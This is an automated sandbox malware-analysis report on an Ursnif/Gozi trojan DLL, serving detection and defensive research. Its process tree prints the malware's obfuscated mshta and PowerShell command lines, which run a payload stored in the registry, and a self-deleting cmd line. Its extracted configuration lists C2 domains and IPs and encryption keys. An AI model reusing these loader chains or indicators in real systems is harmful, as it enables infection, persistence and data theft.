Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
7078612.dll

Overview

General Information

Sample Name:7078612.dll
Analysis ID:752294
MD5:cba263871219062d981111b00cc131fc
SHA1:50e2c7caf7dd0f826bc6e814bd62fbb39982ceed
SHA256:65f687a5c0e757cd8e296f8b0453b27726e5017502e93dcb8379d59fe9c056a3
Tags:dllUrsnif
Infos:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Sigma detected: Dot net compiler compiles file from suspicious location
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Maps a DLL or memory area into another process
Writes to foreign memory regions
Self deletion via cmd or bat file
Changes memory attributes in foreign processes to executable or writable
Machine Learning detection for sample
Allocates memory in foreign processes
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
Drops PE files
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Compiles C# or VB.Net code
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 2128 cmdline: loaddll32.exe "C:\Users\user\Desktop\7078612.dll" MD5: 1F562FBF37040EC6C43C8D5EF619EA39)
    • conhost.exe (PID: 2132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 1132 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\7078612.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 5108 cmdline: rundll32.exe "C:\Users\user\Desktop\7078612.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 5160 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
          • rundll32.exe (PID: 1120 cmdline: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
  • mshta.exe (PID: 5740 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Qnma='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qnma).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 5872 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name cyynsofy -value gp; new-alias -name wklfdppq -value iex; wklfdppq ([System.Text.Encoding]::ASCII.GetString((cyynsofy "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 3444 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ogaysol0.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 984 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESE9EF.tmp" "c:\Users\user\AppData\Local\Temp\CSC256FD05AD86B46298536785867B2F65B.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 5116 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bplkxjdz.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6064 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESF4AD.tmp" "c:\Users\user\AppData\Local\Temp\CSCCB299674C9DE4DC69C5A44CA79DFE4B3.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3320 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 4120 cmdline: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\7078612.dll MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 3764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • PING.EXE (PID: 2828 cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
        • RuntimeBroker.exe (PID: 4060 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "bdyFPOOFadPIE+3Dpt3w3yYYobtlUfGHmkNXXhEHJZrgq+pMKFl/sc2wfLGDAcGr6aqONRURpCfnbKsvcUbIGVS0tUVr4USeghefWwgL9ZQvVt+Wms+/fsaQ4VA9haNvCrTsNgywFQRd86atcQ5HZEvnzynAU+sWx3vgEy3de6xYedEo9QwkMZmOY1efWAGBuAhNzJ+zgYb92lBu1HFwMVWas966cpiEbynar9CpsNFqdLF1t7yizeW2KS+obTRWgYChp39Cmdcy6zxrZh+Fibssh3hcSOGQo3AqO9V622C23Z3ve8vsR2k0wPicse7/Fu+H0+OaWRh90FFOWVCYiIyOZEuvmKiznuluuDx1iWA=", "c2_domain": ["internetwork.top", "interspin.top", "groupconnect.info", "onlinegroup.pw", "onlinesgroup.top", "directoronliner.ru", "directoronliner.su", "premiumdocs.ru", "premiumdocs.info", "dendexmm.com", "fortrexmll.com", "31.207.46.12", "31.207.46.126"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "0gV5XR1ZycScNvAe", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "5050", "SetWaitableTimer_value": "1"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000003.683465563.00000000057D8000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_fd494041unknownunknown
  • 0xff0:$a1: /C ping localhost -n %u && del "%s"
  • 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
  • 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
  • 0xca8:$a5: filename="%.4u.%lu"
  • 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
  • 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X
  • 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X
  • 0xe72:$a9: &whoami=%s
  • 0xe5a:$a10: %u.%u_%u_%u_x%u
  • 0xc22:$a11: size=%u&hash=0x%08x
  • 0xc13:$a12: &uptime=%u
  • 0xda7:$a13: %systemroot%\system32\c_1252.nls
  • 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000003.00000003.683465563.00000000057D8000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_261f5ac5unknownunknown
  • 0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x
  • 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
  • 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu"
  • 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)
  • 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\
  • 0x1cf8:$a9: Software\AppDataLow\Software\Microsoft\
00000003.00000003.265395446.00000000057D8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000003.00000003.265395446.00000000057D8000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_fd494041unknownunknown
    • 0xff0:$a1: /C ping localhost -n %u && del "%s"
    • 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
    • 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
    • 0xca8:$a5: filename="%.4u.%lu"
    • 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
    • 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X
    • 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X
    • 0xe72:$a9: &whoami=%s
    • 0xe5a:$a10: %u.%u_%u_%u_x%u
    • 0xc22:$a11: size=%u&hash=0x%08x
    • 0xc13:$a12: &uptime=%u
    • 0xda7:$a13: %systemroot%\system32\c_1252.nls
    • 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
    00000003.00000003.265395446.00000000057D8000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_261f5ac5unknownunknown
    • 0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x
    • 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
    • 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu"
    • 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)
    • 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\
    • 0x1cf8:$a9: Software\AppDataLow\Software\Microsoft\